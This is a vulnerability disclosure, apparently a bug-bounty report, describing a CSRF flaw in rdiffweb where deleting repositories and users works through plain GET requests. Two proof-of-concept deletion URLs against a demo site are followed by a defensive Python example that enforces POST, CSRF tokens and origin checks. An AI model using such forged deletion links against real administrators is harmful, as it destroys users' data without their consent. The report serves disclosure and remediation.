Description
The server accepts a plain GET request for deleting repositories and users. Because no POST method, CSRF token or origin check is required, a cross-site request forgery (CSRF) attack can delete repositories or users on behalf of a logged-in administrator.
Proof of Concept
Open the URLs below after logging in to the admin account on the demo site.
For deleting a repository: replace “replace-here” with a repository name
https://rdiffweb-demo.ikus-soft.com/delete/admin/replace-here?action=&confirm=replace-here
For deleting a user: replace “username” with a user name
https://rdiffweb-demo.ikus-soft.com/admin/users?action=delete&username=username
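The fix for this class of bug is to refuse state-changing actions on GET and to bind each POST to a per-session CSRF token and a same-origin check. The following is an added illustration written for this report; it is not rdiffweb's own code and does not use its API. The `authorize_state_change` function and the `https://example.invalid` site origin are assumptions made for the example; the three simulated requests in `demo()` are constructed inline.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# HTTP methods that must never cause a side effect such as a deletion.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token():
    """Generate an unguessable per-session CSRF token.

    The server stores it in the session and embeds it in every form that
    performs a state-changing action (delete repository, delete user, ...).
    """
    return secrets.token_urlsafe(32)


def same_origin(origin_header, site_origin):
    """True when the request's Origin (or Referer) header matches our own origin.

    A missing header is rejected; real deployments usually fall back from
    Origin to Referer before giving up, which this simplified check does not do.
    """
    if not origin_header:
        return False
    parts = urlsplit(origin_header)
    return f"{parts.scheme}://{parts.netloc}" == site_origin


def authorize_state_change(method, form_token, session_token, origin_header,
                           site_origin="https://example.invalid"):
    """Decide whether a delete-style request may proceed.

    Returns (allowed, reason). The request must use POST, carry the session's
    CSRF token, and come from our own origin. Any one failure is enough to deny.
    """
    method = method.upper()
    if method in SAFE_METHODS:
        # This is exactly the rdiffweb defect: a GET that deletes data.
        return False, "state-changing action requested with a safe method; require POST"
    if method != "POST":
        return False, f"unsupported method {method}"
    if not session_token or not form_token:
        return False, "missing CSRF token"
    # Constant-time comparison so token validation does not leak timing information.
    if not hmac.compare_digest(form_token, session_token):
        return False, "CSRF token mismatch"
    if not same_origin(origin_header, site_origin):
        return False, "cross-origin request rejected"
    return True, "ok"


def demo():
    """Run three constructed requests through the check and return the verdicts."""
    site = "https://example.invalid"
    session_token = issue_csrf_token()
    requests = [
        # 1. A link-style GET like the proof-of-concept URLs, arriving from elsewhere.
        ("get-delete-link", "GET", None, "https://attacker.invalid"),
        # 2. A forged cross-site POST: the attacker cannot read the victim's token.
        ("forged-post", "POST", "not-the-real-token", "https://attacker.invalid"),
        # 3. A legitimate form submission from the site's own delete page.
        ("legitimate-post", "POST", session_token, site),
    ]
    verdicts = []
    for label, method, form_token, origin in requests:
        allowed, reason = authorize_state_change(method, form_token, session_token, origin, site)
        verdicts.append((label, allowed, reason))
    return verdicts


if __name__ == "__main__":
    for label, allowed, reason in demo():
        print(f"{label:16} allowed={allowed!s:5} {reason}")
```

Only the third request passes; the first fails on the method check alone, which is the minimal change that would have closed the reported issue, and the second shows why the token and origin checks are still needed once POST is required.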